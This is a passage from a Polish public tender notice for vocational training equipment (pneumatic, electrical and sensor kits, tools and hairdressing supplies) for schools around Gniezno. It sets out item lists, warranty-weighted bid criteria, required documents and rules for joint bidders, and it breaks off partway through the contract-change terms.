class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Część 2 – Doposażenie Centrum Kształcenia Zawodowego i Ustawicznego w Gnieźnie, w zakresie jak poniżej:<br/>Lp.	Przedmiot	Ilość<br/>1.	Płyta montażowa	4 szt.<br/>2.	Zespół przygotowania powietrza	4 szt.<br/>3.	Przycisk sterowniczy na szynę TH-35 monostabilny ze stykiem NO	- 14 szt.<br/>4.	Przycisk sterowniczy na szynę TH-35 monostabilny ze stykiem NC - 10 szt.<br/>5.Przycisk sterowniczy na szynę TH-35 przycisk bez samoczynnego powrotu ze stykiem NO- 10 szt.<br/>6. Przycisk sterowniczy na szynę TH-35 przycisk bez samoczynnego powrotu ze stykiem NC	- 10 szt.<br/>7.	Lampka sygnalizacyjna/ kontrolka 24 V DC na szynę TH-35 czerwona	- 10 szt.<br/>8.Lampka sygnalizacyjna/ kontrolka 24 V DC na szynę TH-35 zielona - 10 szt.<br/>9.Lampka sygnalizacyjna /kontrolka 24 V DC na szynę TH-35 żółta -1 szt.<br/>10.	Przekaźnik elektryczny z gniazdem wtykowym -	4 szt.<br/>11.	Przekaźnik czasowy wielofunkcyjny -	4 szt.<br/>12.	Czujnik indukcyjny	- 5 szt.<br/>13.	Czujnik pojemnościowy	- 5 szt.<br/>14.	Czujnik fotoelektryczny refleksyjny -	2 szt.<br/>15.	Czujnik fotoelektryczny odbiciowy	- 2 szt.<br/>16.	Magnetyczny czujnik krańcowy	- 4 szt.<br/>17.	Czujnik ultradźwiękowy	- 2 szt.<br/>18.	Czujnik temperatury Pt100 -	2 szt.<br/>19.	Czujnik temperatury Pt1000- 2 szt.<br/>20.	Czujnik temperatury Ni100	- 2 szt.<br/>21.	Czujnik temperatury termopara typu J	- 2 szt.<br/>22.	Czujnik temperatury termopara typu K- 2 szt.<br/>23.	Kontaktron zestyk NO	- 4 szt.<br/>24.	Kontaktron zestyk NC	- 2 szt.<br/>25.	Półprzewodnikowy czujnik położenia tłoka	- 4 szt.<br/>26.	Łącznik krańcowy z rolką elektryczny	- 2 szt.<br/>27.	Siłownik pneumatyczny dwustronnego działania z magnetycznym tłokiem-	2 szt.<br/>28.	Siłownik pneumatyczny dwustronnego działania z dwustronną amortyzacją	- 2 szt.<br/>29.	Siłownik pneumatyczny jednostronnego działania ze sprężyną zwrotną	- 2 szt.<br/>30.	Elektryczny siłownik liniowy- 2 szt.<br/>31.	Elektrozawór pneumatyczny 3/2 monostabilny NO -	2 szt.<br/>32.	Elektrozawór pneumatyczny 3/2 monostabilny NC	- 2 szt.<br/>33.	Elektrozawór pneumatyczny 5/2 bistabilny	- 2 szt.<br/>34.	Elektrozawór pneumatyczny 5/2 monostabilny -	2 szt.<br/>35. Elektrozawór pneumatyczny rozdzielający 5/3 monostabilny -	2 szt.<br/>36. Blok rozdzielający sygnał pneumatyczny -	3 szt.<br/>37. Zawór dławiąco-zwrotny	- 10 szt.<br/>38.	Zawór odcinający - 2 szt.<br/>39. Manometr	- 1 szt.<br/>40.	Manometr z rurką Bourdona	- 2 szt.<br/>41.	Stycznik mocy- 8 szt.<br/>42.	Blok styków pomocniczych stycznika -	8 szt.<br/>43.	Sprężarka w wykonaniu mobilnym	-1 szt.<br/>44.	Komplet narzędzi monterskich	- 2 szt.<br/>45.	Multimetr cyfrowy -	2 szt.<br/>46.	Przyrząd do cięcia przewodów pneumatycznych -	1 szt.<br/>47.	Skrzynka narzędziowa organizer - 1 szt.<br/>48.	Zasilacz 24V DC na szynę th 35	- 2 szt.<br/>49.	Przemiennik częstotliwości (falownik)	- 2 szt.<br/>50.	Trójfazowy silnik asynchroniczny klatkowy napięcie znamionowe 230/400 V - 2 szt.<br/>51.	Trójfazowy silnik asynchroniczny klatkowy napięcie znamionowe 400/690 V - 2 szt.<br/>52.	Regulator temperatury -	2 szt.<br/>53. Przetwornik temperatury -	2 szt.<br/>54.	Przetwornik ciśnienia - 2 szt.<br/>55.	Tachometr (miernik rpm) laserowy (optyczny)	- 2 szt.<br/>56.	Termometr cieczowy laboratoryjny	- 2 szt.<br/>57.	Element grzejny do szaf sterowniczych	- 2 szt.<br/>58. Czwórnik pneumatyczny	- 10 szt.<br/>59.	Złączka pneumatyczna wtykowa kątowa z gwintem zew.	- 2 szt.<br/>60.	Mostek do złączek szynowych dwuprzewodowych 2002-1201	- 40 szt.<br/>61.	Mostek do złączek szynowych dwuprzewodowych 2002-1201	- 40 szt.<br/>62.	Mostek do złączek szynowych dwuprzewodowych 2002-1201	- 40 szt.<br/>63.	Zestaw egzaminacyjny	- 6 szt.<br/>64.	SZAFY UBRANIOWE BHP	- 5 szt.<br/>II. Szczegółowy opis oraz zestawienia asortymentowo-ilościowe przedmiotu zamówienia określają:<br/>a)	Formularz cenowy- załącznik nr 1B do SWZ<br/>b)	Opis przedmiotu zamówienia (OPZ) -załącznik nr 3 do SWZ<br/>III. Szczegółowe wymagania w zakresie realizacji zamówienia, sposobu i terminu finansowania i płatności określają projektowane postanowienia umowy – załącznik nr 4 do SWZ.<br/>IV. Wymagania związane z realizacją zamówienia:<br/>1)	Przedmiot zamówienia musi być fabrycznie nowy, wolny od wad konstrukcyjnych, materiałowych, wykonawczych i prawnych, nie może posiadać znamion użytkowania. Wszystkie dostarczone elementy wyposażenia składające się na przedmiot zamówienia muszą zawierać odpowiednie, aktualne i wymagane certyfikaty, świadectwa jakości, atesty, deklaracje zgodności lub oznaczenia, informujące o dopuszczeniu do sprzedaży oraz spełniać wszelkie wymogi norm określonych obowiązującym prawem. <br/>2)	Wykonawca udzieli gwarancji na przedmiot zamówienia na okres co najmniej 24 miesięcy. Okres gwarancji rozpoczyna swój bieg od dnia końcowego odbioru dostawy. Okres gwarancji na przedmiot zamówienia stanowi kryterium oceny ofert. Sposób oceny ofert w tym kryterium opisano w części XVIII SWZ. <br/>3)	Warunki gwarancji nie mogą nakazywać Zamawiającemu przechowywania opakowań, w których urządzenia zostaną dostarczone, Zamawiający może usuną opakowania urządzeń po ich dostarczeniu co nie spowoduje utraty gwarancji, a dostarczony sprzęt mimo braku opakowań będzie podlegał usłudze gwarancyjnej. Zasady korzystania z gwarancji i rękojmi określone zostały w § 8 projektowanych postanowień umowy, stanowiących załącznik nr 4 do SWZ.<br/>Okres rękojmi odpowiada okresowi udzielonej przez Wykonawcę gwarancji, jednak nie mniej niż okres wynikający z przepisów Kodeksu cywilnego i zaczyna biec od dnia odbioru końcowego dostawy bez zastrzeżeń przez Zamawiającego.<br/>4)	Zamawiający wymaga, by Wykonawca we flocie pojazdów samochodowych (w rozumieniu art. 2 pkt 33 ustawy z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym) użytkowanych przy wykonywaniu zadania publicznego dysponował odpowiednią liczbą pojazdów elektrycznych lub napędzanych gazem ziemnym, spełniając tym samym wymagania wynikające postanowień art. 68 ust. 3 w związku z art. 35 ust. 2 pkt 2 ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych, o ile wykonanie zamówienia będzie wymagało użycia pojazdów samochodowych.<br/>Rozwiązania równoważne:<br/>1)	W przypadku, gdy wymagania w opisie przedmiotu zamówienia odnoszą się do znaku towarowego, patentu lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę, wszędzie tam Zamawiający wskazuje wyraz „lub równoważne” i dopuszcza możliwość składania ofert równoważnych.<br/>2)	W przypadku składania przez Wykonawcę w ofercie propozycji równoważnych do opisanych w opisie przedmiotu zamówienia, to na Wykonawcy ciąży wykazanie i przedstawienie dowodu, iż oferowane rozwiązania są zgodne z wymaganiami Zamawiającego. W takim przypadku Wykonawca przedstawi w ofercie dowód równoważności za pomocą przedmiotowych środków dowodowych, tj. opis charakterystyki zaoferowanego produktu, który będzie zawierać co najmniej: <br/>-	nazwę producenta typ lub model zaoferowanego produktu (jeśli dotyczy);<br/>-	wszystkie parametry zaoferowanego produktu (jeśli dotyczy) odnosząc się do każdego z wymagań określonych w opisie przedmiotu zamówienia – Wykonawca zobowiązany jest podać konkretne wielkości parametrów lub cechy, które posiada zaoferowany produkt w kontekście każdego wymaganego parametru lub cechy określonej przez Zamawiającego w opisie przedmiotu zamówienia.<br/>4)	Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentach opisujących przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy Pzp, a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne”. <br/>5)	Zgodnie z art. 101 ust. 5 Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 ustawy Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>6)	Przedmiotowe środki dowodowe służące ocenie spełnienia wymagań zaoferowanego produktu równoważnego nie będą podlegały uzupełnieniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31700000-3 - Urządzenia elektroniczne, elektromechaniczne i elektrotechniczne</p> <p class="mb-0">34152000-7 - Symulatory szkoleniowe</p> <p class="mb-0">48190000-6 - Pakiety oprogramowania edukacyjnego</p> <p class="mb-0">39151000-5 - Meble różne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria :<br/>A. Cena<br/>Oferty nieodrzucone oceniane będą według wzoru:<br/>LP=najniższa cena brutto (zł)spośród ofert nie podlegających odrzuceniu / cena brutto badanej oferty(zł) x 60% x 100<br/><br/>B. Okres gwarancji na przedmiot umowy:<br/>Dla celów powyższego kryterium w formularzu ofertowym - załącznik nr 1 do SWZ, Wykonawca poda długość okresu gwarancji w miesiącach na zaoferowany przedmiot umowy. <br/>Minimalny okres gwarancji wynosi 24 miesiące od dnia podpisania protokołu odbioru końcowego (za taki okres gwarancji Wykonawca nie otrzyma żadnych punktów). Maksymalny okres gwarancji – 60 miesięcy od dnia podpisania protokołu odbioru końcowego przedmiotu umowy. Termin obowiązywania gwarancji rozpoczyna bieg od dnia końcowego odbioru przedmiotu zamówienia. <br/>Zaproponowanie okresu gwarancji w przedziale od 25 do 60 miesięcy będzie podlegało punktacji według poniższego wzoru:<br/>LP= Okres gwarancji badanej oferty / Najdłuższy okres gwarancji spośród ofert nie podlegających odrzuceniu x 40% x 100<br/>* zaoferowany (punktowany) okres gwarancji nie może być krótszy niż 25 miesięcy<br/>** zaoferowany (punktowany) okres gwarancji nie może być dłuższy niż 60 miesięcy.<br/>2.	Zamawiający udzieli zamówienia Wykonawcy, który złożył najkorzystniejszą z największą ilością uzyskanych punktów ofertę obejmującą realizację całości zamówienia, stanowiącą sumę punktów przyznanych w ramach każdego z podanych kryteriów udzielenia zamówienia na podstawie wzoru: LP= A+B.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Część 3 - Pozostałe wyposażenie dla dwóch jednostek oświatowych, w zakresie jak poniżej:<br/>Lp.	Przedmiot	Ilość<br/>1.	Wkrętarka -	5 szt.<br/>2.	Makieta domu jednorodzinnego -	1 szt.<br/>3.	Gablota ścienna- 10 szt.<br/>4.	Gablota stojąca -	4 szt.<br/>5.	Główka treningowa -	100 szt.<br/>6.	Lokówka 19mm -	10 szt.<br/>7.	Lokówka 25mm- 10 szt. <br/>8.	Maszynka do strzyżenia -	20 szt.<br/>9.	Komplet grzebieni - 20 szt.<br/>10.	Prostownica -	10 szt.<br/>II. Szczegółowy opis oraz zestawienia asortymentowo-ilościowe przedmiotu zamówienia określają:<br/>a)	Formularz cenowy- załącznik nr 1C do SWZ<br/>b)	Opis przedmiotu zamówienia (OPZ) -załącznik nr 3 do SWZ<br/>III. Szczegółowe wymagania w zakresie realizacji zamówienia, sposobu i terminu finansowania i płatności określają projektowane postanowienia umowy – załącznik nr 4 do SWZ.<br/>IV. Wymagania związane z realizacją zamówienia:<br/>1)	Przedmiot zamówienia musi być fabrycznie nowy, wolny od wad konstrukcyjnych, materiałowych, wykonawczych i prawnych, nie może posiadać znamion użytkowania. Wszystkie dostarczone elementy wyposażenia składające się na przedmiot zamówienia muszą zawierać odpowiednie, aktualne i wymagane certyfikaty, świadectwa jakości, atesty, deklaracje zgodności lub oznaczenia, informujące o dopuszczeniu do sprzedaży oraz spełniać wszelkie wymogi norm określonych obowiązującym prawem. <br/>2)	Wykonawca udzieli gwarancji na przedmiot zamówienia na okres co najmniej 24 miesięcy. Okres gwarancji rozpoczyna swój bieg od dnia końcowego odbioru dostawy. Okres gwarancji na przedmiot zamówienia stanowi kryterium oceny ofert. Sposób oceny ofert w tym kryterium opisano w części XVIII SWZ. <br/>3)	Warunki gwarancji nie mogą nakazywać Zamawiającemu przechowywania opakowań, w których urządzenia zostaną dostarczone, Zamawiający może usuną opakowania urządzeń po ich dostarczeniu co nie spowoduje utraty gwarancji, a dostarczony sprzęt mimo braku opakowań będzie podlegał usłudze gwarancyjnej. Zasady korzystania z gwarancji i rękojmi określone zostały w § 8 projektowanych postanowień umowy, stanowiących załącznik nr 4 do SWZ.<br/>Okres rękojmi odpowiada okresowi udzielonej przez Wykonawcę gwarancji, jednak nie mniej niż okres wynikający z przepisów Kodeksu cywilnego i zaczyna biec od dnia odbioru końcowego dostawy bez zastrzeżeń przez Zamawiającego.<br/>4)	Zamawiający wymaga, by Wykonawca we flocie pojazdów samochodowych (w rozumieniu art. 2 pkt 33 ustawy z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym) użytkowanych przy wykonywaniu zadania publicznego dysponował odpowiednią liczbą pojazdów elektrycznych lub napędzanych gazem ziemnym, spełniając tym samym wymagania wynikające postanowień art. 68 ust. 3 w związku z art. 35 ust. 2 pkt 2 ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych, o ile wykonanie zamówienia będzie wymagało użycia pojazdów samochodowych.<br/>Rozwiązania równoważne:<br/>1)	W przypadku, gdy wymagania w opisie przedmiotu zamówienia odnoszą się do znaku towarowego, patentu lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę, wszędzie tam Zamawiający wskazuje wyraz „lub równoważne” i dopuszcza możliwość składania ofert równoważnych.<br/>2)	W przypadku składania przez Wykonawcę w ofercie propozycji równoważnych do opisanych w opisie przedmiotu zamówienia, to na Wykonawcy ciąży wykazanie i przedstawienie dowodu, iż oferowane rozwiązania są zgodne z wymaganiami Zamawiającego. W takim przypadku Wykonawca przedstawi w ofercie dowód równoważności za pomocą przedmiotowych środków dowodowych, tj. opis charakterystyki zaoferowanego produktu, który będzie zawierać co najmniej: <br/>-	nazwę producenta typ lub model zaoferowanego produktu (jeśli dotyczy);<br/>-	wszystkie parametry zaoferowanego produktu (jeśli dotyczy) odnosząc się do każdego z wymagań określonych w opisie przedmiotu zamówienia – Wykonawca zobowiązany jest podać konkretne wielkości parametrów lub cechy, które posiada zaoferowany produkt w kontekście każdego wymaganego parametru lub cechy określonej przez Zamawiającego w opisie przedmiotu zamówienia.<br/>4)	Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentach opisujących przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy Pzp, a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne”. <br/>5)	Zgodnie z art. 101 ust. 5 Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 ustawy Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>6)	Przedmiotowe środki dowodowe służące ocenie spełnienia wymagań zaoferowanego produktu równoważnego nie będą podlegały uzupełnieniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39712200-8 - Urządzenia fryzjerskie</p> <p class="mb-0">44510000-8 - Narzędzia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria :<br/>A. Cena<br/>Oferty nieodrzucone oceniane będą według wzoru:<br/>LP=najniższa cena brutto (zł)spośród ofert nie podlegających odrzuceniu / cena brutto badanej oferty(zł) x 60% x 100<br/><br/>B. Okres gwarancji na przedmiot umowy:<br/>Dla celów powyższego kryterium w formularzu ofertowym - załącznik nr 1 do SWZ, Wykonawca poda długość okresu gwarancji w miesiącach na zaoferowany przedmiot umowy. <br/>Minimalny okres gwarancji wynosi 24 miesiące od dnia podpisania protokołu odbioru końcowego (za taki okres gwarancji Wykonawca nie otrzyma żadnych punktów). Maksymalny okres gwarancji – 60 miesięcy od dnia podpisania protokołu odbioru końcowego przedmiotu umowy. Termin obowiązywania gwarancji rozpoczyna bieg od dnia końcowego odbioru przedmiotu zamówienia. <br/>Zaproponowanie okresu gwarancji w przedziale od 25 do 60 miesięcy będzie podlegało punktacji według poniższego wzoru:<br/>LP= Okres gwarancji badanej oferty / Najdłuższy okres gwarancji spośród ofert nie podlegających odrzuceniu x 40% x 100<br/>* zaoferowany (punktowany) okres gwarancji nie może być krótszy niż 25 miesięcy<br/>** zaoferowany (punktowany) okres gwarancji nie może być dłuższy niż 60 miesięcy.<br/>2.	Zamawiający udzieli zamówienia Wykonawcy, który złożył najkorzystniejszą z największą ilością uzyskanych punktów ofertę obejmującą realizację całości zamówienia, stanowiącą sumę punktów przyznanych w ramach każdego z podanych kryteriów udzielenia zamówienia na podstawie wzoru: LP= A+B.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Opis charakterystyki zaoferowanego produktu równoważnego – tylko <br/>w przypadku, jeżeli Wykonawca przewiduje ich zastosowanie, tj. w przypadku oferowania produktu równoważnego, o którym mowa w Części III ust. 10 SWZ) - jeżeli dotyczy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> DOKUMENTY SKŁADANE WRAZ Z OFERTĄ:<br/>a)	Formularz ofertowy wypełniony zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ, <br/>b)	Formularz cenowy - załącznik nr 1A– część 1, załącznik nr 1B – część 2, załącznik nr 1C – część 3 do SWZ, <br/>Uwaga: <br/>Wykonawca zobowiązany jest do uzupełnienia wszystkich elementów kolumny nr 3 , <br/>w szczególności do podania producenta/typu lub modelu oferowanego sprzętu, zgodnie z wskazaniami formularza. Brak podania ceny jednostkowej lub brak wskazania wszystkich, wymaganych przez Zamawiającego parametrów identyfikujących oferowany sprzęt spowoduje odrzucenie oferty Wykonawcy, jako niezgodnej z SWZ. Podanie ww. informacji posłuży do weryfikacji zaoferowanego rozwiązania z wymaganiami Zamawiającego określonymi w dokumentach zamówienia (w tym OPZ).<br/><br/>c)	Oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp, traktujące o niepodleganiu wykluczeniu w postępowaniu aktualne na dzień składania ofert w zakresie wskazanym w załączniku nr 2 do SWZ,<br/>	Oświadczenie stanowi wstępne potwierdzenie braku podstaw wykluczenia z postępowania, odpowiednio na dzień składania ofert, <br/>	Oświadczenie składają odrębnie:<br/>- Wykonawca,<br/>- podmiot udostępniający zasoby, w zakresie w jakim go dotyczy (jeżeli dotyczy)<br/>- każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy);<br/>d)	stosowne pełnomocnictwa (jeżeli dotyczy),<br/>	w przypadku składania oferty wspólnej - pełnomocnictwo podmiotów występujących wspólnie, <br/>	pełnomocnictwo do podpisania oferty, względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z dokumentów rejestrowych potwierdzających uprawnienie do występowania w obrocie prawnym;<br/><br/>e)	opis charakterystyki zaoferowanego produktu równoważnego – tylko <br/>w przypadku, jeżeli Wykonawca przewiduje ich zastosowanie, tj. w przypadku oferowania produktu równoważnego, o którym mowa w Części III ust. 10 SWZ) - jeżeli dotyczy;<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia wykonawcy ci składają wspólnie ww. dokumenty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. <br/>W takim przypadku: <br/>	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;<br/>	dokument pełnomocnictwa może zostać załączony do oferty w:<br/>a)	oryginale w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem osobistym lub popisem zaufanym osoby/osób upoważnionej/upoważnionych do reprezentowania Wykonawcy zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej, lub<br/>b)	elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym, podpisem osobistym lub popisem zaufanym osoby posiadającej uprawnienia notariusza;<br/>c)	w przypadku gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>	pełnomocnictwo musi być załączone do oferty i zawierać w szczególności wskazanie: <br/>a)	postępowania o zamówienie publiczne, którego dotyczą, <br/>b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, <br/>c)	ustanowionego pełnomocnika oraz zakresu jego umocowania;<br/>	wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem;<br/>	Oświadczenia i dokumenty wymienione w poniższych punktach muszą być złożone:<br/>	część VIII ust. 1 lit.c) SWZ (Oświadczenie - brak podstaw do wykluczenia <br/>– załącznik nr 2), wraz z ofertą – składa każdy z Wykonawców oddzielnie. <br/>	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia brak podstaw wykluczenia musi wykazać każdy z Wykonawców oddzielnie, wobec powyższego wszystkie oświadczenia i dokumenty w zakresie braku podstaw wykluczenia wymagane w postępowaniu składa odrębnie każdy z Wykonawców wspólnie występujących; <br/>	przed zawarciem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić Zamawiającemu kopię umowy regulującej współpracę tych Wykonawców, zawierającą co najmniej:<br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>2)	określenie zakresu działania poszczególnych stron umowy;<br/>	czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonywania zmian postanowień niniejszej Umowy (niezależnie od możliwości zmian przewidzianych w ustawie Pzp) w zakresie:<br/>1)	w przypadku zaistnienia siły wyższej uniemożliwiającej okresowe wykonanie zgodnie z Umową dostaw będących jej przedmiotem ,pod pojęciem której Strony uznają jakiekolwiek zdarzenie o charakterze nadzwyczajnym, któremu Strony nie mogły zapobiec i którego nie mogły przewidzieć, w szczególności 